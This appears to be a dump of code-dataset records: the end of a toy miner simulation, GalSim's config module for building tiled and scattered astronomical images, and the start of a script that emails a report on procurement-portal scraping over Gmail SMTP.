states.enter_mine_and_dig_for_nugget,\n 'home',\n 0,\n 0,\n 0,\n 0,\n \"bulky\",\n items.small_pickax)\n other_miner = Miner('Sam',\n states.enter_mine_and_dig_for_nugget,\n 'home',\n 
1,\n                        10,\n                        0,\n                        0,\n                        \"lanky\",\n                        items.small_pickax)\n\n    miner_wife = Wife('Deloris',\n                      states.wake_up_and_make_coffee,\n                      'home',\n                      0,\n                      0,\n                      0,\n                      0)\n\n    plant1 = PoisonPlant('mine', 30, 'Poison Mushroom', 'Tired and Thirsty')\n    plant2 = EnergyPlant('mine', 30, 'Super Mushroom', 'Energetic')\n    plant3 = UltraPlant('mine', 30, 'Star Fruit', 'DANKNESS')\n    plant4 = LiquidPlant('mine', 30, 'Snowbell Flower', 'Soothing')\n    game_objects = [real_miner, other_miner, miner_wife]\n    counter = 0\n    plant_chance = [0, 1, 2, 3, 4, 5]\n    while counter < 50:\n        print(\"Game tick {}\".format(counter))\n        for obj in game_objects:\n            obj.update()\n        time.sleep(0.5)\n        counter += 1\n        if random.choice(plant_chance) == 5 and counter % 5 == 0:\n            game_objects.append(plant1)\n            print(\"This looks safe to eat! Nope, wait, nevermind.\")\n        if random.choice(plant_chance) in (1, 4) and counter % 3 == 0:\n            game_objects.append(plant2)\n            print(\"I can hear colors now!\")\n        if random.choice(plant_chance) == 2 and counter % 6 == 0:\n            game_objects.append(plant3)\n            print(\"The fruit of the gods!\")\n        if random.choice(plant_chance) in (0, 3) and counter % 3 == 0:\n            game_objects.append(plant4)\n            print(\"How purtty!\")\n","sub_path":"west_world.py","file_name":"west_world.py","file_ext":"py","file_size_in_byte":6652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} {"seq_id":"176013696","text":"\nimport galsim\n\ndef BuildImages(nimages, config, logger=None, image_num=0, obj_num=0, nproc=1,\n                make_psf_image=False, make_weight_image=False, make_badpix_image=False):\n    \"\"\"\n    Build a number of postage stamp images as specified by the config dict.\n\n    @param nimages             How many images to build.\n    @param config              A configuration dict.\n    @param logger              If given, a logger object to log progress.\n    @param image_num           If given, the current image_num (default = 0)\n    @param obj_num             If given, the current obj_num (default = 0)\n    @param nproc               How many processes to use.\n    @param make_psf_image      Whether to make psf_image.\n    @param make_weight_image   Whether to make weight_image.\n    @param make_badpix_image   Whether to make badpix_image.\n\n    @return (images, psf_images, weight_images, badpix_images)  (All in tuple are lists)\n    \"\"\"\n    import time\n    def worker(input, output):\n        for (kwargs, config, image_num, obj_num, nim, info) in iter(input.get, 'STOP'):\n            results = []\n            # Make new copies of config and kwargs so we can update them without\n            # clobbering the versions for other tasks on the queue.\n            import copy\n            kwargs1 = copy.copy(kwargs)\n            config1 = copy.deepcopy(config)\n            for i in range(nim):\n                t1 = time.time()\n                kwargs1['config'] = config1\n                kwargs1['image_num'] = image_num + i\n                kwargs1['obj_num'] = obj_num\n                im = BuildImage(**kwargs1)\n                obj_num += galsim.config.GetNObjForImage(config, image_num+i)\n                t2 = time.time()\n                results.append( [im[0], im[1], im[2], im[3], t2-t1 ] )\n            output.put( (results, info, current_process().name) )\n    \n    # The kwargs to pass to BuildImage\n    kwargs = {\n        'make_psf_image' : make_psf_image,\n        'make_weight_image' : make_weight_image,\n        'make_badpix_image' : make_badpix_image\n    }\n    # Apparently the logger isn't picklable, so can't send that as an arg.\n\n    if nproc > nimages:\n        if logger:\n            logger.warn(\n                \"Trying to use more processes than images: output.nproc=%d, \"%nproc +\n                \"nimages=%d. 
Reducing nproc to %d.\"%(nimages,nimages))\n nproc = nimages\n\n if nproc <= 0:\n # Try to figure out a good number of processes to use\n try:\n from multiprocessing import cpu_count\n ncpu = cpu_count()\n if ncpu > nimages:\n nproc = nimages\n else:\n nproc = ncpu\n if logger:\n logger.info(\"ncpu = %d. Using %d processes\",ncpu,nproc)\n except:\n raise AttributeError(\n \"config.image.nproc <= 0, but unable to determine number of cpus.\")\n \n if nproc > 1:\n from multiprocessing import Process, Queue, current_process\n\n # Initialize the images list to have the correct size.\n # This is important here, since we'll be getting back images in a random order,\n # and we need them to go in the right places (in order to have deterministic\n # output files). So we initialize the list to be the right size.\n images = [ None for i in range(nimages) ]\n psf_images = [ None for i in range(nimages) ]\n weight_images = [ None for i in range(nimages) ]\n badpix_images = [ None for i in range(nimages) ]\n\n # Number of images to do in each task:\n # At most nimages / nproc.\n # At least 1 normally, but number in Ring if doing a Ring test\n # Shoot for gemoetric mean of these two.\n max_nim = nimages / nproc\n min_nim = 1\n #print 'gal' in config\n if ( ('image' not in config or 'type' not in config['image'] or \n config['image']['type'] == 'Single') and\n 'gal' in config and isinstance(config['gal'],dict) and 'type' in config['gal'] and\n config['gal']['type'] == 'Ring' and 'num' in config['gal'] ):\n min_nim = galsim.config.ParseValue(config['gal'], 'num', config, int)[0]\n #print 'Found ring: num = ',min_nim\n if max_nim < min_nim: \n nim_per_task = min_nim\n else:\n import math\n # This formula keeps nim a multiple of min_nim, so Rings are intact.\n nim_per_task = min_nim * int(math.sqrt(float(max_nim) / float(min_nim)))\n #print 'nim_per_task = ',nim_per_task\n\n # Set up the task list\n task_queue = Queue()\n for k in range(0,nimages,nim_per_task):\n # Send kwargs, config, im_num, nim, k\n if k + nim_per_task > nimages:\n task_queue.put( ( kwargs, config, image_num+k, obj_num, nimages-k, k ) )\n else:\n task_queue.put( ( kwargs, config, image_num+k, obj_num, nim_per_task, k ) )\n for i in range(nim_per_task):\n obj_num += galsim.config.GetNObjForImage(config, image_num+k+i)\n\n # Run the tasks\n # Each Process command starts up a parallel process that will keep checking the queue \n # for a new task. If there is one there, it grabs it and does it. If not, it waits \n # until there is one to grab. When it finds a 'STOP', it shuts down. \n done_queue = Queue()\n p_list = []\n for j in range(nproc):\n p = Process(target=worker, args=(task_queue, done_queue), name='Process-%d'%(j+1))\n p.start()\n p_list.append(p)\n\n # In the meanwhile, the main process keeps going. We pull each set of images off of the \n # done_queue and put them in the appropriate place in the lists.\n # This loop is happening while the other processes are still working on their tasks.\n # You'll see that these logging statements get print out as the stamp images are still \n # being drawn. 
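        #\n        # A minimal standalone sketch of the same task-queue pattern, kept in a comment so the\n        # surrounding function is unchanged; square_worker is a hypothetical work function, not part\n        # of this module, and the snippet should run under an if __name__ == '__main__': guard on\n        # platforms that spawn processes:\n        #\n        #     from multiprocessing import Process, Queue\n        #\n        #     def square_worker(tasks, results):\n        #         for x in iter(tasks.get, 'STOP'):   # 'STOP' is the shutdown sentinel\n        #             results.put(x * x)\n        #\n        #     tasks, results = Queue(), Queue()\n        #     procs = [Process(target=square_worker, args=(tasks, results)) for _ in range(2)]\n        #     for p in procs: p.start()\n        #     for x in range(10): tasks.put(x)\n        #     out = sorted(results.get() for _ in range(10))   # drain all results first\n        #     for p in procs: tasks.put('STOP')                # then shut the workers down\n        #     for p in procs: p.join()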
\n for i in range(0,nimages,nim_per_task):\n results, k, proc = done_queue.get()\n for result in results:\n images[k] = result[0]\n psf_images[k] = result[1]\n weight_images[k] = result[2]\n badpix_images[k] = result[3]\n if logger:\n # Note: numpy shape is y,x\n ys, xs = result[0].array.shape\n t = result[4]\n logger.info('%s: Image %d: size = %d x %d, time = %f sec', \n proc, image_num+k, xs, ys, t)\n k += 1\n\n # Stop the processes\n # The 'STOP's could have been put on the task list before starting the processes, or you\n # can wait. In some cases it can be useful to clear out the done_queue (as we just did)\n # and then add on some more tasks. We don't need that here, but it's perfectly fine to do.\n # Once you are done with the processes, putting nproc 'STOP's will stop them all.\n # This is important, because the program will keep running as long as there are running\n # processes, even if the main process gets to the end. So you do want to make sure to \n # add those 'STOP's at some point!\n for j in range(nproc):\n task_queue.put('STOP')\n for j in range(nproc):\n p_list[j].join()\n task_queue.close()\n\n else : # nproc == 1\n\n images = []\n psf_images = []\n weight_images = []\n badpix_images = []\n\n for k in range(nimages):\n t1 = time.time()\n kwargs['config'] = config\n kwargs['image_num'] = image_num+k\n kwargs['obj_num'] = obj_num\n kwargs['logger'] = logger\n result = BuildImage(**kwargs)\n images += [ result[0] ]\n psf_images += [ result[1] ]\n weight_images += [ result[2] ]\n badpix_images += [ result[3] ]\n t2 = time.time()\n if logger:\n # Note: numpy shape is y,x\n ys, xs = result[0].array.shape\n logger.info('Image %d: size = %d x %d, time = %f sec', image_num+k, xs, ys, t2-t1)\n obj_num += galsim.config.GetNObjForImage(config, image_num+k)\n\n if logger:\n logger.debug('Done making images')\n\n return images, psf_images, weight_images, badpix_images\n \n\ndef BuildImage(config, logger=None, image_num=0, obj_num=0,\n make_psf_image=False, make_weight_image=False, make_badpix_image=False):\n \"\"\"\n Build an image according to the information in config.\n\n This function acts as a wrapper for:\n BuildSingleImage \n BuildTiledImage \n BuildScatteredImage \n choosing between these three using the contents of config if specified (default = Single)\n\n @param config A configuration dict.\n @param logger If given, a logger object to log progress.\n @param image_num If given, the current image_num (default = 0)\n @param obj_num If given, the current obj_num (default = 0)\n @param make_psf_image Whether to make psf_image.\n @param make_weight_image Whether to make weight_image.\n @param make_badpix_image Whether to make badpix_image.\n\n @return (image, psf_image, weight_image, badpix_image) \n\n Note: All 4 images are always returned in the return tuple,\n but the latter 3 might be None depending on the parameters make_*_image.\n \"\"\"\n # Make config['image'] exist if it doesn't yet.\n if 'image' not in config:\n config['image'] = {}\n image = config['image']\n if not isinstance(image, dict):\n raise AttributeError(\"config.image is not a dict.\")\n\n # Normally, random_seed is just a number, which really means to use that number\n # for the first item and go up sequentially from there for each object.\n # However, we allow for random_seed to be a gettable parameter, so for the \n # normal case, we just convert it into a Sequence.\n if 'random_seed' in image and not isinstance(image['random_seed'],dict):\n first_seed = galsim.config.ParseValue(image, 'random_seed', 
config, int)[0]\n image['random_seed'] = { 'type' : 'Sequence' , 'first' : first_seed }\n\n if 'draw_method' not in image:\n image['draw_method'] = 'fft'\n\n if 'type' not in image:\n image['type'] = 'Single' # Default is Single\n type = image['type']\n\n valid_types = [ 'Single', 'Tiled', 'Scattered' ]\n if type not in valid_types:\n raise AttributeError(\"Invalid image.type=%s.\"%type)\n\n build_func = eval('Build' + type + 'Image')\n all_images = build_func(\n config=config, logger=logger,\n image_num=image_num, obj_num=obj_num,\n make_psf_image=make_psf_image, \n make_weight_image=make_weight_image,\n make_badpix_image=make_badpix_image)\n\n # The later image building functions build up the weight image as the total variance \n # in each pixel. We need to invert this to produce the inverse variance map.\n # Doing it here means it only needs to be done in this one place.\n if all_images[2]:\n all_images[2].invertSelf()\n\n return all_images\n\n\ndef BuildSingleImage(config, logger=None, image_num=0, obj_num=0,\n make_psf_image=False, make_weight_image=False, make_badpix_image=False):\n \"\"\"\n Build an image consisting of a single stamp\n\n @param config A configuration dict.\n @param logger If given, a logger object to log progress.\n @param image_num If given, the current image_num (default = 0)\n @param obj_num If given, the current obj_num (default = 0)\n @param make_psf_image Whether to make psf_image.\n @param make_weight_image Whether to make weight_image.\n @param make_badpix_image Whether to make badpix_image.\n\n @return (image, psf_image, weight_image, badpix_image) \n\n Note: All 4 images are always returned in the return tuple,\n but the latter 3 might be None depending on the parameters make_*_image. \n \"\"\"\n config['seq_index'] = image_num\n\n ignore = [ 'draw_method', 'noise', 'wcs', 'nproc' , 'random_seed' ]\n opt = { 'size' : int , 'xsize' : int , 'ysize' : int ,\n 'pixel_scale' : float , 'sky_level' : float }\n params = galsim.config.GetAllParams(\n config['image'], 'image', config, opt=opt, ignore=ignore)[0]\n\n # If image_xsize and image_ysize were set in config, this overrides the read-in params.\n if 'image_xsize' in config and 'image_ysize' in config:\n xsize = config['image_xsize']\n ysize = config['image_ysize']\n else:\n size = params.get('size',0)\n xsize = params.get('xsize',size)\n ysize = params.get('ysize',size)\n\n if (xsize == 0) != (ysize == 0):\n raise AttributeError(\n \"Both (or neither) of image.xsize and image.ysize need to be defined and != 0.\")\n\n pixel_scale = params.get('pixel_scale',1.0)\n config['pixel_scale'] = pixel_scale\n if 'pix' not in config:\n config['pix'] = { 'type' : 'Pixel' , 'xw' : pixel_scale }\n\n sky_level = params.get('sky_level',None)\n\n return galsim.config.BuildSingleStamp(\n config=config, xsize=xsize, ysize=ysize, obj_num=obj_num,\n sky_level=sky_level, do_noise=True, logger=logger,\n make_psf_image=make_psf_image, \n make_weight_image=make_weight_image,\n make_badpix_image=make_badpix_image)\n\n\ndef BuildTiledImage(config, logger=None, image_num=0, obj_num=0,\n make_psf_image=False, make_weight_image=False, make_badpix_image=False):\n \"\"\"\n Build an image consisting of a tiled array of postage stamps\n\n @param config A configuration dict.\n @param logger If given, a logger object to log progress.\n @param image_num If given, the current image_num (default = 0)\n @param obj_num If given, the current obj_num (default = 0)\n @param make_psf_image Whether to make psf_image.\n @param make_weight_image Whether to 
make weight_image.\n @param make_badpix_image Whether to make badpix_image.\n\n @return (image, psf_image, weight_image, badpix_image) \n\n Note: All 4 images are always returned in the return tuple,\n but the latter 3 might be None depending on the parameters make_*_image. \n \"\"\"\n config['seq_index'] = image_num\n\n ignore = [ 'random_seed', 'draw_method', 'noise', 'wcs', 'nproc', 'center' ]\n req = { 'nx_tiles' : int , 'ny_tiles' : int }\n opt = { 'stamp_size' : int , 'stamp_xsize' : int , 'stamp_ysize' : int ,\n 'border' : int , 'xborder' : int , 'yborder' : int ,\n 'pixel_scale' : float , 'nproc' : int , 'sky_level' : float, \n 'order' : str }\n params = galsim.config.GetAllParams(\n config['image'], 'image', config, req=req, opt=opt, ignore=ignore)[0]\n\n nx_tiles = params['nx_tiles']\n ny_tiles = params['ny_tiles']\n nobjects = nx_tiles * ny_tiles\n\n stamp_size = params.get('stamp_size',0)\n stamp_xsize = params.get('stamp_xsize',stamp_size)\n stamp_ysize = params.get('stamp_ysize',stamp_size)\n\n if (stamp_xsize == 0) or (stamp_ysize == 0):\n raise AttributeError(\n \"Both image.stamp_xsize and image.stamp_ysize need to be defined and != 0.\")\n\n border = params.get(\"border\",0)\n xborder = params.get(\"xborder\",border)\n yborder = params.get(\"yborder\",border)\n\n sky_level = params.get('sky_level',None)\n\n do_noise = xborder >= 0 and yborder >= 0\n # TODO: Note: if one of these is < 0 and the other is > 0, then\n # this will add noise to the border region. Not exactly the \n # design, but I didn't bother to do the bookkeeping right to \n # make the borders pure 0 in that case.\n \n full_xsize = (stamp_xsize + xborder) * nx_tiles - xborder\n full_ysize = (stamp_ysize + yborder) * ny_tiles - yborder\n\n # If image_xsize and image_ysize were set in config, make sure it matches.\n if ( 'image_xsize' in config and 'image_ysize' in config and\n (full_xsize != config['image_xsize'] or full_ysize != config['image_ysize']) ):\n raise ValueError(\n \"Unable to reconcile saved image_xsize and image_ysize with provided \"+\n \"nx_tiles=%d, ny_tiles=%d, \"%(nx_tiles,ny_tiles) +\n \"xborder=%d, yborder=%d\\n\"%(xborder,yborder) +\n \"Calculated full_size = (%d,%d) \"%(full_xsize,full_ysize)+\n \"!= required (%d,%d).\"%(config['image_xsize'],config['image_ysize']))\n\n pixel_scale = params.get('pixel_scale',1.0)\n config['pixel_scale'] = pixel_scale\n if 'pix' not in config:\n config['pix'] = { 'type' : 'Pixel' , 'xw' : pixel_scale }\n\n # Set the rng to use for image stuff.\n if 'random_seed' in config['image']:\n config['seq_index'] = obj_num+nobjects\n # Technically obj_num+nobjects will be the index of the random seed used for the next \n # image's first object (if there is a next image). But I don't think that will have \n # any adverse effects.\n seed = galsim.config.ParseValue(config['image'], 'random_seed', config, int)[0]\n rng = galsim.BaseDeviate(seed)\n else:\n rng = galsim.BaseDeviate()\n\n # If we have a power spectrum in config, we need to get a new realization at the start\n # of each image.\n if 'power_spectrum' in config:\n # PowerSpectrum can only do a square FFT, so make it the larger of the two n's.\n n_tiles = max(nx_tiles, ny_tiles)\n stamp_size = max(stamp_xsize, stamp_ysize)\n grid_dx = stamp_size * pixel_scale\n\n config['power_spectrum'].getShear(grid_spacing=grid_dx, grid_nx=n_tiles, rng=rng)\n # We don't care about the output here. 
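        #\n        # For illustration, later per-object lookups on the grid built above are point calls of\n        # the same method; a sketch, assuming a position in arcsec on the grid (the pos form of\n        # PowerSpectrum.getShear):\n        #\n        #     g1, g2 = config['power_spectrum'].getShear(pos=galsim.PositionD(12.3, 45.6))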
This just builds the grid, which we'll\n # access for each object using its position.\n\n # Make a list of ix,iy values according to the specified order:\n order = params.get('order','row').lower()\n if order.startswith('row'):\n ix_list = [ ix for iy in range(ny_tiles) for ix in range(nx_tiles) ]\n iy_list = [ iy for iy in range(ny_tiles) for ix in range(nx_tiles) ]\n elif order.startswith('col'):\n ix_list = [ ix for ix in range(nx_tiles) for iy in range(ny_tiles) ]\n iy_list = [ iy for ix in range(nx_tiles) for iy in range(ny_tiles) ]\n elif order.startswith('rand'):\n ix_list = [ ix for ix in range(nx_tiles) for iy in range(ny_tiles) ]\n iy_list = [ iy for ix in range(nx_tiles) for iy in range(ny_tiles) ]\n galsim.random.permute(rng, ix_list, iy_list)\n \n # Define a 'center' field so the stamps can set their position appropriately in case\n # we need it for PowerSpectum or NFWHalo.\n config['image']['center'] = { \n 'type' : 'XY' ,\n 'x' : { 'type' : 'List',\n 'items' : [ ix * (stamp_xsize+xborder) + stamp_xsize/2 + 1 for ix in ix_list ]\n },\n 'y' : { 'type' : 'List',\n 'items' : [ iy * (stamp_ysize+yborder) + stamp_ysize/2 + 1 for iy in iy_list ]\n }\n }\n\n nproc = params.get('nproc',1)\n\n full_image = galsim.ImageF(full_xsize,full_ysize)\n full_image.setZero()\n full_image.setScale(pixel_scale)\n\n # Also define the overall image center, since we need that to calculate the position \n # of each stamp relative to the center.\n image_cen = full_image.bounds.center()\n config['image_cen'] = galsim.PositionD(image_cen.x,image_cen.y)\n\n if make_psf_image:\n full_psf_image = galsim.ImageF(full_xsize,full_ysize)\n full_psf_image.setZero()\n full_psf_image.setScale(pixel_scale)\n else:\n full_psf_image = None\n\n if make_weight_image:\n full_weight_image = galsim.ImageF(full_xsize,full_ysize)\n full_weight_image.setZero()\n full_weight_image.setScale(pixel_scale)\n else:\n full_weight_image = None\n\n if make_badpix_image:\n full_badpix_image = galsim.ImageS(full_xsize,full_ysize)\n full_badpix_image.setZero()\n full_badpix_image.setScale(pixel_scale)\n else:\n full_badpix_image = None\n\n stamp_images = galsim.config.BuildStamps(\n nobjects=nobjects, config=config,\n xsize=stamp_xsize, ysize=stamp_ysize, obj_num=obj_num, \n nproc=nproc, sky_level=sky_level, do_noise=do_noise, logger=logger,\n make_psf_image=make_psf_image,\n make_weight_image=make_weight_image,\n make_badpix_image=make_badpix_image)\n\n images = stamp_images[0]\n psf_images = stamp_images[1]\n weight_images = stamp_images[2]\n badpix_images = stamp_images[3]\n\n for k in range(nobjects):\n ix = ix_list[k]\n iy = iy_list[k]\n xmin = ix * (stamp_xsize + xborder) + 1\n xmax = xmin + stamp_xsize-1\n ymin = iy * (stamp_ysize + yborder) + 1\n ymax = ymin + stamp_ysize-1\n b = galsim.BoundsI(xmin,xmax,ymin,ymax)\n full_image[b] += images[k]\n if make_psf_image:\n full_psf_image[b] += psf_images[k]\n if make_weight_image:\n full_weight_image[b] += weight_images[k]\n if make_badpix_image:\n full_badpix_image[b] |= badpix_images[k]\n\n if not do_noise:\n if 'noise' in config['image']:\n # If we didn't apply noise in each stamp, then we need to apply it now.\n draw_method = galsim.config.GetCurrentValue(config['image'],'draw_method')\n if draw_method == 'fft':\n galsim.config.AddNoiseFFT(\n full_image,full_weight_image,config['image']['noise'],config,rng,sky_level)\n elif draw_method == 'phot':\n galsim.config.AddNoisePhot(\n full_image,full_weight_image,config['image']['noise'],config,rng,sky_level)\n else:\n raise 
AttributeError(\"Unknown draw_method %s.\"%draw_method)\n elif sky_level:\n # If we aren't doing noise, we still need to add a non-zero sky_level\n full_image += sky_level * pixel_scale**2\n\n return full_image, full_psf_image, full_weight_image, full_badpix_image\n\n\ndef BuildScatteredImage(config, logger=None, image_num=0, obj_num=0,\n make_psf_image=False, make_weight_image=False, make_badpix_image=False):\n \"\"\"\n Build an image containing multiple objects placed at arbitrary locations.\n\n @param config A configuration dict.\n @param logger If given, a logger object to log progress.\n @param image_num If given, the current image_num (default = 0)\n @param obj_num If given, the current obj_num (default = 0)\n @param make_psf_image Whether to make psf_image.\n @param make_weight_image Whether to make weight_image.\n @param make_badpix_image Whether to make badpix_image.\n\n @return (image, psf_image, weight_image, badpix_image) \n\n Note: All 4 images are always returned in the return tuple,\n but the latter 3 might be None depending on the parameters make_*_image. \n \"\"\"\n config['seq_index'] = image_num\n\n ignore = [ 'random_seed', 'draw_method', 'noise', 'wcs', 'nproc' , 'center' ]\n req = { 'nobjects' : int }\n opt = { 'size' : int , 'xsize' : int , 'ysize' : int , \n 'stamp_size' : int , 'stamp_xsize' : int , 'stamp_ysize' : int ,\n 'pixel_scale' : float , 'nproc' : int , 'sky_level' : float }\n params = galsim.config.GetAllParams(\n config['image'], 'image', config, req=req, opt=opt, ignore=ignore)[0]\n\n nobjects = params['nobjects']\n\n # Special check for the size. Either size or both xsize and ysize is required.\n if 'size' not in params:\n if 'xsize' not in params or 'ysize' not in params:\n raise AttributeError(\n \"Either attribute size or both xsize and ysize required for image.type=Scattered\")\n full_xsize = params['xsize']\n full_ysize = params['ysize']\n else:\n if 'xsize' in params:\n raise AttributeError(\n \"Attributes xsize is invalid if size is set for image.type=Scattered\")\n if 'ysize' in params:\n raise AttributeError(\n \"Attributes ysize is invalid if size is set for image.type=Scattered\")\n full_xsize = params['size']\n full_ysize = params['size']\n\n stamp_size = params.get('stamp_size',0)\n stamp_xsize = params.get('stamp_xsize',stamp_size)\n stamp_ysize = params.get('stamp_ysize',stamp_size)\n\n sky_level = params.get('sky_level',None)\n\n # If image_xsize and image_ysize were set in config, make sure it matches.\n if ( 'image_xsize' in config and 'image_ysize' in config and\n (full_xsize != config['image_xsize'] or full_ysize != config['image_ysize']) ):\n raise ValueError(\n \"Unable to reconcile saved image_xsize and image_ysize with provided \"+\n \"xsize=%d, ysize=%d, \"%(full_xsize,full_ysize))\n\n pixel_scale = params.get('pixel_scale',1.0)\n config['pixel_scale'] = pixel_scale\n if 'pix' not in config:\n config['pix'] = { 'type' : 'Pixel' , 'xw' : pixel_scale }\n\n # Set the rng to use for image stuff.\n if 'random_seed' in config['image']:\n config['seq_index'] = obj_num+nobjects\n # Technically obj_num+nobjects will be the index of the random seed used for the next \n # image's first object (if there is a next image). 
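        #\n        # Concretely: with image.random_seed = { 'type' : 'Sequence', 'first' : 1000 } and\n        # nobjects = 5, the objects of this image consume seeds 1000+obj_num .. 1004+obj_num, and\n        # the lines below re-derive 1000+obj_num+5 for the image-level rng; a sketch of that\n        # convention, not additional API:\n        #\n        #     rng = galsim.BaseDeviate(1000 + obj_num + nobjects)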
But I don't think that will have \n # any adverse effects.\n seed = galsim.config.ParseValue(config['image'], 'random_seed', config, int)[0]\n rng = galsim.BaseDeviate(seed)\n else:\n rng = galsim.BaseDeviate()\n\n # If we have a power spectrum in config, we need to get a new realization at the start\n # of each image.\n if 'power_spectrum' in config:\n # TODO: For now we use a grid spacing of 1/20 of the full size. We are eventually\n # going to have a better way to calculate a good grid spacing. c.f. Issue #248.\n full_size = max(full_xsize, full_ysize)\n grid_dx = full_size * pixel_scale / 20.\n grid_nx = 21\n\n config['power_spectrum'].getShear(grid_spacing=grid_dx, grid_nx=grid_nx, rng=rng)\n # We don't care about the output here. This just builds the grid, which we'll\n # access for each object using its position.\n\n if 'center' not in config['image']:\n config['image']['center'] = { \n 'type' : 'XY' ,\n 'x' : { 'type' : 'Random' , 'min' : 1 , 'max' : full_xsize },\n 'y' : { 'type' : 'Random' , 'min' : 1 , 'max' : full_ysize }\n }\n\n nproc = params.get('nproc',1)\n\n full_image = galsim.ImageF(full_xsize,full_ysize)\n full_image.setZero()\n full_image.setScale(pixel_scale)\n\n # Also define the overall image center, since we need that to calculate the position \n # of each stamp relative to the center.\n image_cen = full_image.bounds.center()\n config['image_cen'] = galsim.PositionD(image_cen.x,image_cen.y)\n\n if make_psf_image:\n full_psf_image = galsim.ImageF(full_xsize,full_ysize)\n full_psf_image.setZero()\n full_psf_image.setScale(pixel_scale)\n else:\n full_psf_image = None\n\n if make_weight_image:\n full_weight_image = galsim.ImageF(full_xsize,full_ysize)\n full_weight_image.setZero()\n full_weight_image.setScale(pixel_scale)\n else:\n full_weight_image = None\n\n if make_badpix_image:\n full_badpix_image = galsim.ImageS(full_xsize,full_ysize)\n full_badpix_image.setZero()\n full_badpix_image.setScale(pixel_scale)\n else:\n full_badpix_image = None\n\n stamp_images = galsim.config.BuildStamps(\n nobjects=nobjects, config=config,\n xsize=stamp_xsize, ysize=stamp_ysize, obj_num=obj_num,\n nproc=nproc, sky_level=sky_level, do_noise=False, logger=logger,\n make_psf_image=make_psf_image,\n make_weight_image=make_weight_image,\n make_badpix_image=make_badpix_image)\n\n images = stamp_images[0]\n psf_images = stamp_images[1]\n weight_images = stamp_images[2]\n badpix_images = stamp_images[3]\n\n for k in range(nobjects):\n bounds = images[k].bounds & full_image.bounds\n #print 'stamp bounds = ',images[k].bounds\n #print 'full bounds = ',full_image.bounds\n #print 'Overlap = ',bounds\n if bounds.isDefined():\n full_image[bounds] += images[k][bounds]\n if make_psf_image:\n full_psf_image[bounds] += psf_images[k][bounds]\n if make_weight_image:\n full_weight_image[bounds] += weight_images[k][bounds]\n if make_badpix_image:\n full_badpix_image[bounds] |= badpix_images[k][bounds]\n else:\n if logger:\n logger.warn(\n \"Object centered at (%d,%d) is entirely off the main image,\\n\"%(\n images[k].bounds.center().x, images[k].bounds.center().y) +\n \"whose bounds are (%d,%d,%d,%d).\"%(\n full_image.bounds.xmin, full_image.bounds.xmax,\n full_image.bounds.ymin, full_image.bounds.ymax))\n\n if 'noise' in config['image']:\n # Apply the noise to the full image\n draw_method = galsim.config.GetCurrentValue(config['image'],'draw_method')\n if draw_method == 'fft':\n galsim.config.AddNoiseFFT(\n full_image,full_weight_image,config['image']['noise'],config,rng,sky_level)\n elif draw_method == 
'phot':\n galsim.config.AddNoisePhot(\n full_image,full_weight_image,config['image']['noise'],config,rng,sky_level)\n else:\n raise AttributeError(\"Unknown draw_method %s.\"%draw_method)\n\n elif sky_level:\n # If we aren't doing noise, we still need to add a non-zero sky_level\n full_image += sky_level * pixel_scale**2\n\n return full_image, full_psf_image, full_weight_image, full_badpix_image\n\n\n\n","sub_path":"galsim/config/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":30103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"500448914","text":"from AdvDAB import AdvDAB\nfrom LaAdvDAB import LaAdvDAB\nfrom VaAdvDAB import VaAdvDAB\nfrom MiAdvDAB import MiAdvDAB\nimport smtplib # Import smtplib for the actual sending function\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\n\ndef email_report(report):\n me = \"adamchangadvertising@gmail.com\"\n you = \"stephen@bidprime.com\"\n cc = \"josh2xg@gmail.com\"\n recipients = [you, cc]\n\n # Create message container - the correct MIME type is multipart/alternative.\n msg = MIMEMultipart('alternative')\n msg['Subject'] = \"DAB Report\"\n msg['From'] = me\n msg['To'] = you\n msg['CC'] = cc\n\n report_body = MIMEText(report, 'plain')\n msg.attach(report_body)\n mailserver = smtplib.SMTP('smtp.gmail.com',587)\n mailserver.ehlo() # re-identify ourselves as an encrypted connection\n mailserver.starttls() # secure our email with tls encryption\n mailserver.login(me, 'pwd')\n mailserver.sendmail(me, recipients, msg.as_string())\n mailserver.quit()\n return\n\ndef conduct():\n # dab_input_list = \\\n # [AdvDAB('Advantage Site: Honolulu 0', 'https://www5.honolulu.gov/webapp/VSSPSRV1/AltSelfService', False, True)]\n\n # dab_input_list = \\\n # [AdvDAB('Advantage Site: Fulton Georgia 0', 'https://www.fultonvendorselfservice.co.fulton.ga.us/webapp/VSSPROD/AltSelfService', False, True)]\n\n # dab_input_list = \\\n # [AdvDAB('Advantage Site: Fulton Georgia 0', 'https://www.fultonvendorselfservice.co.fulton.ga.us/webapp/VSSPROD/AltSelfService', False, True),\n # AdvDAB('Advantage Site: Kentucky 0', 'https://emars.ky.gov/webapp/vssonline/AltSelfService', True, True),\n # AdvDAB('Advantage Site: Dallas 0', 'https://bids.dallascityhall.com/webapp/VSSPROD/AltSelfService', True, True),\n # AdvDAB('Advantage Site: Honolulu 0', 'https://www5.honolulu.gov/webapp/VSSPSRV1/AltSelfService', True, True),\n # AdvDAB('Advantage Site: West Viriginia 0', 'https://prod-fin-vss.wvoasis.gov/webapp/prdvss11/AltSelfService', True, True),\n # AdvDAB('Advantage Site: Colorado 0', 'http://colorado.gov/vss', True, True),\n # AdvDAB('Advantage Site: Alabama 0', 'https://procurement.staars.alabama.gov/webapp/PRDVSS1X1/AltSelfService', True, True),\n # AdvDAB('Advantage Site: Alaska 0', 'https://iris-vss.alaska.gov/webapp/PRDVSS1X1/AltSelfService', True, True),\n # AdvDAB('Advantage Site: Iowa 0', 'https://vss.iowa.gov/webapp/VSS_ON/AltSelfService', True, True),\n # AdvDAB('Advantage Site: Palm Beach 0', 'https://pbcvssp.co.palm-beach.fl.us/webapp/vssp/AltSelfService', True, True),\n # AdvDAB('Advantage Site: Grand Rapids 0', 'https://cgiadvantage360.cgi.com/MICGR/AltSelfService', True, True),\n # # LaAdvDAB('Advantage Site Variant: Los Angeles 0', 'https://lacovss.lacounty.gov/webapp/VSSPSRV11/AltSelfService', True),\n # # MiAdvDAB('Advantage Site Variant: Michigan 0', 'https://sigma.michigan.gov/webapp/PRDVSS2X1/AltSelfService', True, 30),\n # # VaAdvDAB('Advantage Site 
